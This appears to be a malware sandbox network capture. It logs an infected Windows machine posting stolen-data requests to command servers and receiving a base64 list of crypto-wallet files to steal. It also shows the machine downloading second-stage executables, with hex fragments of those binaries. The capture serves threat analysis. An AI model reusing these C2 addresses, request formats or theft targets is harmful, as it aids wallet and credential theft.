68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 15, 2024 14:09:31.156915903 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDG Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="message"files------KJDHCAFCGDAAKEBFIJDG--
Nov 15, 2024 14:09:31.448826075 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:09:31.459816933 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDH Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="file"------FIIECFHDBAAECAAKFHDH--
Nov 15, 2024 14:09:32.296394110 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:09:32.320517063 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEB Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 2d 2d 0d 0a Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="message"ybncbhylepme------EHJKFCGHIDHCBGDHJKEB--
Nov 15, 2024 14:09:32.622075081 CET	271	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=
Nov 15, 2024 14:09:37.035094023 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJD Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GIJJKKJJDAAAAAKFHJJD--
Nov 15, 2024 14:09:37.828352928 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49761	185.215.113.16	80	4940	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:09:32.631678104 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 15, 2024 14:09:33.601088047 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:09:33 GMT Content-Type: application/octet-stream Content-Length: 3243008 Last-Modified: Fri, 15 Nov 2024 12:59:28 GMT Connection: keep-alive ETag: "673745b0-317c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 80 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@1}>2@WkHl1tl1 @.rsrcH@.idata @edncfhzz**@ywkrkdulp1V1@.taggant01"Z1@
Nov 15, 2024 14:09:33.601332903 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:09:33.601360083 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:09:33.601943970 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:09:33.601959944 CET	1236	IN	Data Raw: 09 7a 86 1b 71 eb 7e d5 b9 1f bc 8d ba f7 bb 6b 62 bb 43 33 4c 3a 42 1b d1 3a 1f 2c 65 9d 5f b3 a9 7b 86 1b 71 cb 7d d5 b9 1f 9c 8d ba f7 bb 0b 62 bb 43 33 6c 3a 42 1b d1 3a 1f 2c 65 9d 47 b3 99 7b 86 1b 71 1b 7a d5 b9 1f 7c 8d ba f7 bb ab 63 bb Data Ascii: zq~kbC3L:B:,e_{q}bC3l:B:,eG{qz\|cC3:B:,ek{qs\KcC3,:B:,e{qKz<dC3:B:,e_={qSzdC3:B:,e_-{qu+dC3:B:,e{q\|eC
Nov 15, 2024 14:09:33.604492903 CET	1236	IN	Data Raw: 8c 36 42 1b d1 3a 1f 2c 65 9d 47 b3 e5 79 86 1b 71 c3 7e d5 b9 1f dc b0 ba f7 bb cb 51 bb 43 33 ac 36 42 1b d1 3a 1f 2c 65 9d 47 b3 ed 79 86 1b 71 47 76 d5 b9 1f bc b0 ba f7 bb 6b 51 bb 43 33 4c 31 42 1b d1 3a 1f 2c 65 9d 5b b3 d5 79 86 1b 71 4b Data Ascii: 6B:,eGyq~QC36B:,eGyqGvkQC3L1B:,e[yqKqQC3l1B:,eGyq\|RC31B:,eGyqr\KRC3,1B:,e_1yqr<SC31B:,eG!yqC}SC31B:,eG)yqy
Nov 15, 2024 14:09:33.604510069 CET	1236	IN	Data Raw: b9 1f 1c b4 ba f7 bb 8b 5f bb 43 33 ec 4d 42 1b d1 3a 1f 2c 65 9d 83 b3 89 7c 86 1b 71 f3 79 d5 b9 1f fc b7 ba f7 bb 2b 5f bb 43 33 8c 4d 42 1b d1 3a 1f 2c 65 9d 93 b3 31 7c 86 1b 71 17 76 d5 b9 1f dc b7 ba f7 bb cb 40 bb 43 33 ac 4d 42 1b d1 3a Data Ascii: _C3MB:,e\|qy+_C3MB:,e1\|qv@C3MB:,eSe\|qyk@C3LLB:,ewY\|qw@C3lLB:,e_}q}\|AC3LB:,e}q\KAC3,LB:,e9}qu<BC3LB:
Nov 15, 2024 14:09:33.605494976 CET	1236	IN	Data Raw: 65 9d 41 b3 0d 78 85 1b 40 36 e6 18 b8 9f e3 05 fd f7 3b 80 0e f4 43 96 7d e3 00 2c 65 23 1f 2c 65 9d 5f 33 b4 45 42 1b c0 47 35 d4 b9 7c 43 90 f9 fb e0 7b 3e b9 43 33 ec 48 42 1b 3b 3b 5b 56 65 9f 93 02 fd f7 3b d4 0e f4 43 a0 7c 23 1f 2c 65 9f Data Ascii: eAx@6;C},e#,e_3EBG5\|C{>C3HB;;[Ve;C\|#,e3;C\|[;CR;C\|Am@;C}w@A@oo;8C\|L#;C@=@1v{$:CVg
Nov 15, 2024 14:09:33.605511904 CET	1236	IN	Data Raw: 91 ea 40 1b 23 a0 4f 97 7d ff 04 12 38 f9 86 1b 23 39 70 2c d7 1f 87 71 ba f7 d8 34 d6 35 47 1b 64 23 1f 2c 65 23 1f 2c 65 23 1f 2c 65 a8 d8 0f ef 62 32 eb d0 37 de d5 bd a7 04 12 2c f8 86 1b de e6 15 18 23 b8 5b 96 79 fb 93 33 65 e5 40 1b 3b 3b Data Ascii: @#O}8#9p,q45Gd#,e#,e#,eb27,#[y3e@;;[RwEb5Gd#,e#,e#,e$[b"Gnz#,e#,e#,e$[n"G{C/e#,e#,e#,e$z?$_nbGbCZK45[7n^#,e$G
Nov 15, 2024 14:09:33.608546972 CET	1236	IN	Data Raw: 65 23 1f 2c 65 23 1f 2c 65 a8 d8 0f ea 62 86 ef ef 62 b6 13 ef a7 da 84 b5 1f 9a 63 ba f7 d8 2b 60 b9 53 1b b8 f7 43 6e 63 3e 85 e7 a8 f7 43 1b 3b 3b 47 55 bf f7 de 80 ba 7d 42 d8 3d 37 b6 00 84 26 92 a9 24 21 3b ea ef f4 43 ba 24 39 ad 6e 5e 90 Data Ascii: e#,e#,ebbc+`SCnc>C;;GU}B=7&$!;C$9n^#,eO[b2[Afz#9{C/eg[,Cy@z>7\u@p:,e#,e#,e$[yA\|;C/e#,e#,e#,e<_x8`7h:Cll\y>E
Nov 15, 2024 14:09:33.617748022 CET	1120	IN	Data Raw: fa fb 43 1b b8 f7 c0 9d f5 f7 b6 14 21 a1 8f 0e bf 62 85 db 22 bf 47 90 e7 b7 04 d5 b5 f4 43 1b b8 f6 b5 0b 41 80 d4 18 b8 7a 07 14 3d 37 5c 94 0e f7 43 1b 7f b8 4f 1b b8 f6 43 94 54 e6 c7 6f b9 f7 43 33 8e 7e 42 1b 23 07 de ba a1 62 1d c7 79 07 Data Ascii: C!b"GCAz=7\COCToC3~B#by\HxbDnhqCbDX<@`0bWx9CCbWx``OCAz=7`OCa\X#*GnCb&{CA;+CA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49797	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:04.222806931 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:10:05.111947060 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49810	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:06.625257015 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:10:07.539371967 CET	654	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 63 66 0d 0a 20 3c 63 3e 31 30 30 36 34 33 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 64 34 35 62 35 63 38 34 66 36 33 32 32 34 32 37 66 61 38 31 64 61 39 38 38 38 32 65 38 66 66 66 61 62 31 63 39 37 36 39 35 30 65 35 66 61 61 35 63 66 36 34 35 34 31 35 66 31 62 39 64 63 34 65 31 23 31 30 30 36 34 34 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 36 34 34 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 36 34 34 32 30 33 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 [TRUNCATED] Data Ascii: 1cf <c>1006431001+++b5937c1a99d5f9dd0d45b5c84f6322427fa81da98882e8fffab1c976950e5faa5cf645415f1b9dc4e1#1006440001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1006441001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1006442031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1006443001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49816	176.113.115.203	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:07.548280954 CET	59	OUT	GET /thebig/stories.exe HTTP/1.1 Host: 176.113.115.203
Nov 15, 2024 14:10:08.544588089 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Fri, 15 Nov 2024 13:10:08 GMT Content-Type: application/octet-stream Content-Length: 6233398 Connection: keep-alive X-Powered-By: PHP/7.4.33 Content-Description: File Transfer Content-Disposition: attachment; filename=stories.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 33 11 c4 5c 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 6a 0a 00 00 94 00 00 00 00 00 00 d0 7e 0a 00 00 10 00 00 00 90 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 e0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL3\j~@@@`@FB@P.textPR `.itexthpV `.data78n@.bsslg.idata@@.didataP@.edata`@@.tlsp.rdata]
Nov 15, 2024 14:10:08.544641018 CET	1236	IN	Data Raw: 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 46 00 00 00 90 0b 00 00 46 00 00 00 bc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 00 00 00 00 00 02 0b 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@.rsrcFF@@@@@Boolean@FalseTrueSystem4@AnsiChar
Nov 15, 2024 14:10:08.544653893 CET	424	IN	Data Raw: 74 61 02 00 00 00 10 40 00 09 42 69 67 45 6e 64 69 61 6e 02 00 02 00 09 18 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 03 16 b4 10 40 00 04 44 61 74 61 02 00 00 e4 10 40 00 0b 41 53 74 61 72 74 49 6e 64 65 78 02 00 00 00 10 40 00 09 42 69 67 Data Ascii: ta@BigEndianJCreate@@@Data@AStartIndex@BigEndian@PInterfaceEntry@@TInterfaceEntry@@IID@VTable@IOffsetp@ImplGetter@PI
Nov 15, 2024 14:10:08.544673920 CET	1236	IN	Data Raw: 00 00 10 40 00 02 12 84 15 40 00 04 4c 65 66 74 02 00 12 84 15 40 00 05 52 69 67 68 74 02 00 02 00 0b 18 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 84 15 40 00 04 4c 65 66 74 02 00 12 84 15 40 00 05 52 69 67 68 Data Ascii: @@Left@RightJ&op_Inequality@@Left@RightJ&op_GreaterThan@@Left@RightJ&op_GreaterThanOrEqual@@Left@RightJ&op_LessThan@@Left
Nov 15, 2024 14:10:08.544682980 CET	212	IN	Data Raw: 40 00 01 00 06 41 43 6c 61 73 73 02 00 02 00 3b 00 f0 60 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 00 11 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 74 61 40 00 0d 4d Data Ascii: @AClass;`@MethodAddress@Self@Name;ta@MethodAddress@Self@NameFa@MethodName@Self@Address@@=JQu
